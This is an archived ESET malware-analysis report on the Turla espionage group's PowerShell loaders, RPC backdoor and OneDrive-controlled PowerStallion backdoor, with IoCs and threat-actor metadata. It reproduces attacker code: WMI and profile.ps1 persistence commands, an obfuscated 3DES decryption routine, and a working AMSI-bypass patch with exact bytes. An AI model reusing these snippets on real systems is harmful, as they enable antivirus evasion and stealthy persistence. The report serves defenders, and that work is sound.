{ "id": "57b19683-6d7f-49a8-b685-59ee166f60da", "created_at": "2026-04-06T00:13:54.300429Z", "updated_at": "2026-04-10T03:33:36.035821Z", "deleted_at": null, "sha1_hash": "4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c", "title": "A dive into Turla PowerShell usage", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 449702, "plain_text": "A dive into Turla PowerShell usage\r\nBy Matthieu FaouRomain Dumont\r\nArchived: 2026-04-05 17:19:22 UTC\r\nTurla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound\r\ndetection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and\r\nexecution of malware executables and libraries. This allows them to bypass detection that can trigger when a\r\nmalicious executable is dropped on disk.\r\nTurla is believed to have been operating since at least 2008, when it successfully breached the US military. More\r\nrecently, it was involved in major attacks against the German Foreign Office and the French military.\r\nThis is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing\r\nsecurity products. In 2018, Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was\r\nbased on the open-source project Posh-SecMod. However, it was quite buggy and often led to crashes.\r\nAfter a few months, Turla has improved these scripts and is now using them to load a wide range of custom\r\nmalware from its traditional arsenal.\r\nThe victims are quite usual for Turla. We identified several diplomatic entities in Eastern Europe that were\r\ncompromised using these scripts. However, it is likely the same scripts are used more globally against many\r\ntraditional Turla targets in Western Europe and the Middle East. Thus, this blogpost aims to help defenders\r\ncounter these PowerShell scripts. We will also present various payloads, including an RPC-based backdoor and a\r\nbackdoor leveraging OneDrive as its Command and Control (C\u0026C) server.\r\nPowerShell Loader\r\nThe PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded\r\nexecutable or library.\r\nPersistence\r\nThe PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory\r\nonly the embedded executables. We have seen Turla operators use two persistence methods:\r\nA Windows Management Instrumentation (WMI) event subscription\r\nAlteration of the PowerShell profile (profile.ps1 file).\r\nWindows Management Instrumentation\r\nIn the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply\r\ncommand lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 1 of 13\n\nWindows registry. Figure 1 shows how the persistence is established.\r\nGet-WmiObject CommandLineEventConsumer -Namespace root\\subscription -filter \"name='Syslog Consumer'\" | Remove-W\r\n$NLP35gh = Set-WmiInstance -Namespace \"root\\subscription\" -Class 'CommandLineEventConsumer' -Arguments @{name='S\r\nGet-WmiObject __eventFilter -namespace root\\subscription -filter \"name='Log Adapter Filter'\"| Remove-WmiObject;\r\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -match 'Log Adapt\r\n$IT825cd = \"SELECT * FROM __instanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInsta\r\n$VQI79dcf = Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments @{name='Log Adapter Fil\r\nSet-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$VQI79dcf;Cons\r\n \r\nGet-WmiObject __eventFilter -namespace root\\subscription -filter \"name='AD Bridge Filter'\"| Remove-WmiObject;\r\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -match 'AD Bridge\r\n$IT825cd = \"SELECT * FROM __instanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedDat\r\n$VQI79dcf = Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments @{name='AD Bridge Filte\r\nSet-WmiInstance -Namespace root\\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$VQI79dcf;Cons\r\nFigure 1. Persistence using WMI\r\nThese events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The\r\nvariable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows\r\nRegistry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the\r\npayload.\r\n[System.Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(\"\u003cbase64-encoded password and salt\"\u003e)) | ie\r\nFigure 2. WMI consumer PowerShell command\r\nFinally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a\r\ndifferent registry location per organization. Thus, it is not a useful indicator to detect similar intrusions.\r\nProfile.ps1\r\nIn the latter case, attackers alter the PowerShell profile. According to the Microsoft documentation:\r\nA PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to\r\ncustomize the environment. You can add commands, aliases, functions, variables, snap-ins, modules, and\r\nPowerShell drives.\r\nFigure 3 shows a PowerShell profile modified by Turla.\r\ntry\r\n{\r\n $SystemProc = (Get-WmiObject 'Win32_Process' | ?{$_.ProcessId -eq $PID} | % {Invoke-WmiMethod -InputObject\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 2 of 13\n\nif (\"$SystemProc\" -ne \"\")\r\n {\r\n $([Convert]::ToBase64String($([Text.Encoding]::ASCII.GetBytes(\"\u003cm\u003e$([DateTime]::Now.ToString('G')): STARTE\r\n [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\"IABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbg\r\n kill $PID;\r\n }\r\n}\r\ncatch{$([Convert]::ToBase64String($([Text.Encoding]::ASCII.GetBytes(\"\u003cm\u003e$([DateTime]::Now.ToString('G')): $_ \u003c/m\r\nFigure 3. Hijacked profile.ps1 file\r\nThe base64-encoded PowerShell command is very similar to the one used in the WMI consumers.\r\nDecryption\r\nThe payload stored in the Windows registry is another PowerShell script. It is generated using the open-source\r\nscript Out-EncryptedScript.ps1 from the Penetration testing framework PowerSploit. In addition, the variable\r\nnames are randomized to obfuscate the script, as shown in Figure 4.\r\n$GSP540cd = \"\u003cbase64 encoded + encrypted payload\u003e\";\r\n$RS99ggf = $XZ228hha.GetBytes(\"PINGQXOMQFTZGDZX\");\r\n$STD33abh = [Convert]::FromBase64String($GSP540cd);\r\n$SB49gje = New-Object System.Security.Cryptography.PasswordDeriveBytes($IY51aab, $XZ228hha.GetBytes($CBI61aeb),\r\n[Byte[]]$XYW18ja = $SB49gje.GetBytes(16);\r\n$EN594ca = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;\r\n$EN594ca.Mode = [System.Security.Cryptography.CipherMode]::CBC;\r\n[Byte[]]$ID796ea = New-Object Byte[]($STD33abh.Length);\r\n$ZQD772bf = $EN594ca.CreateDecryptor($XYW18ja, $RS99ggf);\r\n$DCR12ffg = New-Object System.IO.MemoryStream($STD33abh, $True);\r\n$WG731ff = New-Object System.Security.Cryptography.CryptoStream($DCR12ffg, $ZQD772bf, [System.Security.Cryptogra\r\n$XBD387bb = $WG731ff.Read($ID796ea, 0, $ID796ea.Length);\r\n$OQ09hd = [YR300hf]::IWM01jdg($ID796ea);\r\n$DCR12ffg.Close();\r\n$WG731ff.Close();\r\n$EN594ca.Clear();\r\nreturn $XZ228hha.GetString($OQ09hd,0,$OQ09hd.Length);\r\nFigure 4. Decryption routine\r\nThe payload is decrypted using the 3DES algorithm. The Initialization Vector, PINGQXOMQFTZGDZX in this\r\nexample, is different for each sample. The key and the salt are also different for each script and are not stored in\r\nthe script, but only in the WMI filter or in the profile.ps1 file.\r\nPE loader\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 3 of 13\n\nThe payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is\r\nloaded directly into the memory of a randomly chosen process that is already running on the system.\r\nIn some samples, the attackers specify a list of executables that the binary should not be injected into, as shown in\r\nFigure 5.\r\n$IgnoreNames = @(\"smss.exe\",\"csrss.exe\",\"wininit.exe\",\"winlogon.exe\",\"lsass.exe\",\"lsm.exe\",\"svchost.exe\",\"avp.e\r\nFigure 5. Example list of excluded processes\r\nIt is interesting to note that the names avp.exe, avpsus.exe, klnagent.exe and vapm.exe refer to Kaspersky Labs\r\nexecutables. It seems that Turla operators really want to avoid injecting their malware into Kaspersky software.\r\nAMSI bypass\r\nIn some samples deployed since March 2019, Turla developers modified their PowerShell scripts in order to\r\nbypass the Antimalware Scan Interface (AMSI). This is an interface allowing any Windows application to\r\nintegrate with the installed antimalware product. It is particularly useful for PowerShell and macros.\r\nThey did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and\r\nFall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the\r\nlibrary amsi.dll.\r\nThe PowerShell script loads a .NET executable to retrieve the address of AmsiScanBuffer. Then, it calls\r\nVirtualProtect to allow writing at the retrieved address.\r\nFinally, the patching is done directly in the PowerShell script as shown in Figure 6. It modifies the beginning of\r\nAmsiScanBuffer to always return 1 (AMSI_RESULT_NOT_DETECTED). Thus, the antimalware product will\r\nnot receive the buffer, which prevents any scanning.\r\n$ptr = [Win32]::FindAmsiFun();\r\nif($ptr -eq 0)\r\n{\r\nWrite-Host \"protection not found\"\r\n}\r\nelse\r\n{\r\nif([IntPtr]::size -eq 4)\r\n{\r\nWrite-Host \"x32 protection detected\"\r\n$buf = New-Object Byte[] 7\r\n$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18\r\n$c = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)\r\n}\r\nelse\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 4 of 13\n\n{\r\nWrite-Host \"x64 protection detected\"\r\n$buf = New-Object Byte[] 6\r\n$buf[0] = 0xb8; $buf[1] = 0x01; $buf[2] = 0x00; $buf[3] = 0x00; $buf[4] = 0x00; $buf[5] = 0xc3\r\n$c = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 6)\r\n}\r\n}\r\nFigure 6. Patching of AmsiScanBuffer function\r\nPayloads\r\nThe PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC\r\nBackdoor and a PowerShell backdoor.\r\nRPC backdoor\r\nTurla has developed a whole set of backdoors relying on the RPC protocol. These backdoors are used to perform\r\nlateral movement and take control of other machines in the local network without relying on an external C\u0026C\r\nserver.\r\nThe features implemented are quite basic: file upload, file download and command execution via cmd.exe or\r\nPowerShell. However, the malware also supports the addition of plugins.\r\nThis RPC backdoor is split into two components: a server and a client. An operator will use the client component\r\nto execute commands on another machine where the server component exists, as summarized in Figure 7.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 5 of 13\n\nFigure 7. RPC backdoor usage\r\nFor instance, the sample identified by the following SHA-1 hash\r\nEC54EF8D79BF30B63C5249AF7A8A3C652595B923 is a client version. This component opens the named pipe\r\n\\\\pipe\\\\atctl with the protocol sequence being “ncacn_np” via the RpcStringBindingComposeW function. The\r\nsample can then send commands by calling the NdrClientCall2 function. The exported procedure HandlerW ,\r\nresponsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or\r\ntry to steal another’s process token just for the execution of a command.\r\nIts server counterpart does the heavy lifting and implements the different commands. It first checks if the registry\r\nkey value HKLM\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes contains\r\n“atctl”. If so, the server sets the security descriptor on the pipe object to \"S:(ML;;NW;;;S-1-16-0)\" via the\r\nSetSecurityInfo function. This will make the pipe available to everyone (untrusted/anonymous integrity level).\r\nThe following image shows the corresponding MIDL stub descriptor and the similar syntax and interface ID.\r\nFigure 8. RPC backdoor client’s MIDL on the left, server's on the right\r\nAs mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for\r\nfiles matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart\r\nis called. Among the various plugins we have located so far, one is able to steal recent files and files from USB\r\nthumb drives.\r\nMany variants of this RPC backdoor are used in the wild. Among some of them, we have seen local proxies (using\r\nupnprpc as the endpoint and ncalrpc as the protocol sequence) and newer versions embedding PowerShellRunner\r\nto run scripts directly without using powershell.exe.\r\nRPC Spoof Server\r\nDuring our research, we also discovered a portable executable with the embedded pdb\r\npath C:\\Users\\Devel\\source\\repos\\RPCSpoofer\\x64\\Release_Win2016_10\\RPCSpoofServerInstall.pdb (SHA-1:\r\n9D1C563E5228B2572F5CA14F0EC33CA0DEDA3D57).\r\nThe main purpose of this utility is to retrieve the RPC configuration of a process that has registered an interface.\r\nIn order to find that kind of process, it iterates through the TCP table (via the GetTcpTable2 function) until it\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 6 of 13\n\neither finds the PID of the process that has opened a specific port, or retrieves the PID of the process that has\r\nopened a specific named pipe. Once this PID is found, this utility reads the remote process’ memory and tries to\r\nretrieve the registered RPC interface. The code for this, seen in Figure 9, seems ripped from this Github\r\nrepository.\r\nFigure 9. Snippet of code searching for the .data section of rpcrt4.dll in a remote process (Hex-Rays screenshot)\r\nAt first we were unsure how the retrieved information was used but then another sample, (SHA-1:\r\nB948E25D061039D64115CFDE74D2FF4372E83765) helped us understand. As shown in Figure 10, this sample\r\nretrieves the RPC interface, unsets the flag to RPC_IF_ALLOW_SECURE_ONLY, and patches the “dispatch\r\ntable” in memory using the WriteProcessMemory function. Those operations would allow the sample to add its\r\nRPC functions to an already existing RPC interface. We believe it is stealthier to re-use an existing RPC interface\r\nthan to create a custom one.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 7 of 13\n\nFigure 10. Snippet of code retrieving the RPC dispatch table of the current process (Hex-Rays screenshot)\r\nPowerStallion\r\nPowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as\r\nC\u0026C server. The credentials are hardcoded at the beginning of the script, as shown in Figure 11.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 8 of 13\n\nFigure 11. OneDrive credentials in PowerStallion script\r\nIt is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor\r\nand in LightNeuron. They also used the name of a real employee of the targeted organization in the email address.\r\nThen it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12,\r\nif a command is available. This backdoor can only execute additional PowerShell scripts. It writes the command\r\nresults in another OneDrive subfolder and encrypts it with the XOR key 0xAA.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 9 of 13\n\nFigure 12. Main loop of the PowerStallion backdoor\r\nAnother interesting artefact is that the script modifies the modification, access and creation (MAC) times of the\r\nlocal log file to match the times of a legitimate file – desktop.ini in that example, as shown in Figure 13.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 10 of 13\n\nFigure 13. Modification of MAC times of the local log file\r\nWe believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are\r\ncleaned and operators can no longer access the compromised computers. We have seen operators use this\r\nbackdoor for the following purposes:\r\nMonitoring antimalware logs.\r\nMonitoring the Windows process list.\r\nInstalling ComRAT version 4, one of the Turla second-stage backdoors.\r\nConclusion\r\nIn a 2018 blogpost, we predicted that Turla would use more and more generic tools. This new research confirms\r\nour forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to\r\nconduct intrusion.\r\nHowever, it does not prevent attributing such attacks to Turla. Attackers tend to configure or modify those open-source tools to better suit their needs. Thus, it is still possible to separate different clusters of activities.\r\nFinally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads\r\ndelivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our\r\nrecent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom\r\nmalware.\r\nWe will continue monitoring new Turla activities and will publish relevant information on our blog. For any\r\ninquiries, contact us as threatintel@eset.com. Indicators of Compromise can also be found on our GitHub.\r\nIndicators of Compromise (IoCs)\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 11 of 13\n\nHashes\r\nSHA-1 hash Description\r\nESET detection\r\nname\r\n50C0BF9479EFC93FA9CF1AA99BDCA923273B71A1\r\nPowerShell loader with\r\nencrypted payload\r\nPowerShell/Turla.T\r\nEC54EF8D79BF30B63C5249AF7A8A3C652595B923 RPC backdoor (client) Win64/Turla.BQ\r\n9CDF6D5878FC3AECF10761FD72371A2877F270D0 RPC backdoor (server) Win64/Turla.BQ\r\nD3DF3F32716042404798E3E9D691ACED2F78BDD5\r\nFile exfiltration RPC\r\nplugin\r\nWin32/Turla.BZ\r\n9D1C563E5228B2572F5CA14F0EC33CA0DEDA3D57 RPCSpoofServerInstaller Win64/Turla.BS\r\nB948E25D061039D64115CFDE74D2FF4372E83765 RPC interface patcher Win64/Turla.BR\r\nFilenames\r\nRPC components\r\n%PUBLIC%\\iCore.dat (log file, one-byte XOR 0x55)\r\n\\\\pipe\\\\atctl (named pipe)\r\nPowerStallion\r\nmsctx.ps1\r\nC:\\Users\\Public\\Documents\\desktop.db\r\nRegistry keys\r\nRPC components\r\nHKLM\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes contains\r\natctl\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nExecution T1086 PowerShell\r\nThe loaders are written in PowerShell.\r\nSome RPC components can execute\r\nPowerShell commands.\r\nPersistence T1084\r\nWindows Management\r\nInstrumentation Event\r\nSubscription\r\nThe PowerShell loaders use WMI for\r\npersistence.\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 12 of 13\n\nTactic ID Name Description\r\nDefense\r\nEvasion\r\nT1027 Obfuscated Files or Information\r\nThe RPC backdoor and PowerStallion\r\nencrypt the log file.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nThe PowerShell loaders decrypt the\r\nembedded payload.\r\nT1055 Process Injection\r\nThe PowerShell loaders inject the payload\r\ninto a remote process.\r\nT1099 Timestomp\r\nPowerStallion modifies the timestamps of\r\nits log file.\r\nDiscovery\r\nT1083 File and Directory Discovery\r\nThe RPC plugin gathers file and directory\r\ninformation.\r\nT1120 Peripheral Device Discovery The RPC plugin monitors USB drives.\r\nT1012 Query Registry\r\nThe server component of the RPC\r\nbackdoor queries the registry for\r\nNullSessionPipes.\r\nT1057 Process Discovery\r\nPowerStallion sent the list of running\r\nprocesses.\r\nCollection\r\nT1005 Data from Local System\r\nThe RPC plugin collects recent files from\r\nthe local file system.\r\nT1025 Data from Removable Media\r\nThe RPC plugin collects files from USB\r\ndrives.\r\nCommand and\r\nControl\r\nT1071\r\nStandard Application Layer\r\nProtocol\r\nThe RPC backdoor uses RPC and\r\nPowerStallion uses OneDrive via SMB.\r\nExfiltration T1041\r\nExfiltration Over Command and\r\nControl Channel\r\nPowerStallion exfiltrates information\r\nthrough the C\u0026C channel.\r\nSource: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" ], "report_names": [ "turla-powershell-usage" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434434, "ts_updated_at": 1775792016, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.pdf", "text": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.txt", "img": "https://archive.orkl.eu/4d2de6d3b7a1acf7cbe9f9394ae1fb404d088c9c.jpg" } }